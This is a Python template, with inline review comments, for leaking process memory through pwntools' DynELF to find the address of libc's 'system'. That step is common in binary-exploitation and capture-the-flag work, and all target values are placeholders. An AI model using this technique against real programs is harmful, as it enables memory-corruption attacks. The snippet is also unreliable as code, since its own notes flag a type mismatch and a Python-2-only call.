# Template for resolving a libc symbol with pwntools' DynELF.
# './xxx' and the "xxxxxxxx" strings are the page's placeholders, not real values.
# `process`, `log`, `DynELF` and `ELF` are not defined in this snippet; they are
# presumably brought in by a pwntools import elsewhere -- confirm.
p = process('./xxx')


def leak(address):
    """Read-memory callback handed to DynELF.

    Sends a request built around ``address`` to the target process and
    returns the bytes read back from it (up to 4 per call).
    """
    # (target-specific preparation goes here)
    # NOTE(review): `address` is concatenated with str here but formatted with
    # %#x in the log line below, so the two uses disagree on its type. This
    # line is a placeholder for the real request encoding.
    filler = "xxxxxxxx"
    request = filler + address + filler
    p.send(request)
    # (target-specific handling of the response goes here)
    leaked = p.recv(4)
    # NOTE(review): str.encode('hex') exists only on Python 2.
    rendered = (leaked or '').encode('hex')
    log.debug("%#x => %s" % (address, rendered))
    return leaked


# Initialise the DynELF module with the leak callback and the target ELF.
d = DynELF(
    leak,
    elf=ELF("./xxx"),
)
# Look up the address of the `system` function in libc.
systemAddress = d.lookup('system', 'libc')